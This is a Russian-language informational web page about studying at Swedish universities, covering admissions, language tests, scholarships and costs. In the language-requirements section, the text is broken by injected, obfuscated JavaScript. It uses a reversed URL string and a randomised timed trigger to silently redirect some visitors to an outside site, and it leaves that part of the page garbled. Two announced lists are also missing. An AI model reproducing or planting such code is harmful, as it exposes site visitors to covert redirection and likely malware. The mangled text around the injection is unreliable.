Есть вопросы? Задавайте!
Меню

Высшее образование в Швеции

Получение образования в других государствах стало сейчас довольно популярно, но когда становится вопрос о выборе страны обучения, на одно из первых мест выходит Швеция – страна старейших университетов, заработавших себе громкую славу. Однако, информации о вузах этой страны довольно мало. Как поступить, как учиться, а главное, сколько денег придется потратить на обучение и придется ли?

Наибольшую популярность обрели институты Швеции, имеющие за плечами большую историю ведения образования. Список некоторых из них приведен ниже:

Уппсальский университет
(ориг. назв. Uppsala universitet
Основан в 1477 году. С университетом связаны имена таких выдающихся учёных, как Юхан Валлериус, Карл Линней, Адам Афцелиус, Андерс Цельсий. В составе ВУЗа находятся девять факультетов: общественных наук, богословия, лингвистический, педагогический, фармацевтический, юридический, естественнонаучный, медицинский и факультет искусств. При университете находятся также научные центры факультетов, ботанический сад и библиотека, насчитывающая свыше четырехсот тысяч томов научных и публицистических работ.
Лундский университет
(ориг. назв. Lunds universitet)
Основан спустя два века после Уппсальского – в 1666 году. Здесь на данный момент обучается около 34 тысяч студентов. Университет Лунда в Швеции включает в себя семь факультетов, осуществляющих подготовку по пятидесяти программам обучения. Также университет участвует в международном объединении университетов для совместного ведения научной работы Universitas 21.
Каролинский институт
(ориг. назв. Karolinska institutet)
Высшее учебное заведение медицинской направленности. Был основан в 1810 году. Комитет Каролинского института назначает лауреатов Нобелевской премии в области медицины. Больницы, прикрепленные к Каролинскому институту, вместе с ВУЗом образуют научный центр здоровья.
Королевский технологический институт
(ориг. назв. Kungliga Tekniska högskolan)
Основан в 1827 году. Является одним из лучших технических учебных заведений Европы, оспаривает звание лучшего университета такой направленности Скандинавии у Технологического Университета Хельсинки.
Гётеборгский университет
ориг. назв. Göteborgs universitet)
Был основан сравнительно недавно, в 1954 году, но уже стал одним из ведущих вузов Швеции. В состав университета входит восемь факультетов (факультет искусства, академия медицины, педагогический факультет, научный факультет, школа бизнеса, факультет общественных наук, школа изобразительного искусства), из которых выделяется еще 60 отделений.

Преимущества обучения в вузах Швеции

Говоря о сильных сторонах получения высшего образования в шведских университетах, нельзя оставлять без внимания, что весь процесс обучения построен на дружеских, неформальных для учебного процесса, взаимоотношениях между преподавателями и учениками. Этот фактор позволяет развить творческое мышление студентов, что благоприятно сказывается на успехах в учебной деятельности. Следует рассмотреть также свойства обучения в институтах Швеции:Уппсальский университет в Швеции

  1. Обучающийся имеет возможность проходить практику несколько раз за весь период обучения благодаря связям между производствами и центрами обучения.
  2. Вузам дана полная независимость в разработке учебных программ, что позволяет совершенствовать их, добавляя в программы ту информацию, что действительно в дальнейшем пригодится студентам на производстве.
  3. Качество образования стоит на первом месте для любого института в Швеции.
  4. Студенты, приехавшие из других стран, могут пройти курс обучения исключительно на английском языке, что способствует быстрой адаптации в учебной среде.
  5. Обучение может предоставляться абсолютно бесплатно.

Однако, чтобы испытать все преимущества обучения в шведских университетах на себе, нужно пройти непростую вступительную кампанию.

Требования к языку обучения

Если абитуриент планирует обучаться на шведском языке, нужно сдать языковой экзамен TISUS в любом посольстве или университете. Стоимость сдачи такого теста равна 2 тысяч крон (около 10 тысяч рублей).

!Необязательно владеть шведским языком для обучения в этой стране: как уже было сказано выше, многие вузы Швеции предоставляют возможность для обучения на английском языке, но для этого также придется сдать тест на знание английского языка. Минимальный балл, определяющий владение языком для TOEFL – IBT 90, для IELTS – 6,5.toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dokumenty-350×232.jpg” alt=”документы для вузов Швеции” width=”350″ height=”232″ />

Документы

Для того, чтобы стать студентом одного из высших учебных заведений Швеции, нужно, прежде всего, в срок (с 01.02 по 15.08) подать документы в систему образования, в компетенцию которой входит обработка данных о всех абитуриентах. Документы можно подать и позже, но шансы на поступление тогда будут значительно ниже: зачисление произведется только при наличии свободных мест.

Порядок подачи документов таков:

Теперь подробнее о стипендиях и возможностях бесплатно обучаться в Швеции.стипендии в вузах Швеции

Ежегодно в институтах Швеции присуждается более ста стипендий для студентов-иностранцев. Возрастных ограничений на получение стипендии нет, но при этом для её получения обязательны такие условия:

  1. Заявитель не должен обладать видом на жительство или разрешением на какую-либо деятельность в Швеции.
  2. Также заявитель должен проживать в Швеции менее двух лет (что, опять-таки, обусловлено отсутствием вида на жительство)
  3. Нельзя участвовать в других программах на получение стипендии.

Стипендиальные конкурсы проводятся как некоммерческими, так и правительственными организациями, среди которых:

Некоммерческие организации чаще всего располагаются на базе конкретного вуза Швеции. К примеру, в нескольких таких программах участвует Гетеборгский университет.

!Получить стипендиальную поддержку можно и при помощи принимающего института, куда были поданы документы. О такой возможности нужно заранее узнавать на сайте университета.

Для тех, кто не получил стипендию, обучение в шведском вузе окажется довольно затратным: стоимость обучения находится в пределах от 80 до 140 тысяч крон за один год, что примерно равняется 9-16 тысяч евро.

Абитуриенту стоит быть готовым к некоторым трудностям обучения в Швеции, таким как поиск жилья, система обучения, отдаленность от родной культуры.

С жильем в Швеции ситуация для студентов непростая: многие не получают место общежитии в срок, а так называемых «студенческих квартир» в стране становится все меньше.

В самом процессе обучения студенту также придется столкнуться с нововведениями: в Швеции действует культура «консенсуса», когда считается, что все должны быть равны, без выделения лидера.

Добавить комментарий

Ваш адрес email не будет опубликован.